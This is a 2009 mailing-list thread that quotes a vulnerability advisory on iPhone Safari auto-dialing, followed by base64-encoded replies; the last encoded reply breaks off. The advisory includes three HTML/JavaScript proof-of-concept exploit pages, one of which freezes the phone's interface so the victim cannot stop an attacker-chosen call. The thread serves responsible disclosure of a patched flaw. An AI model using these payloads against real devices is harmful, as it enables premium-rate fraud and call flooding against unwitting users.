>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
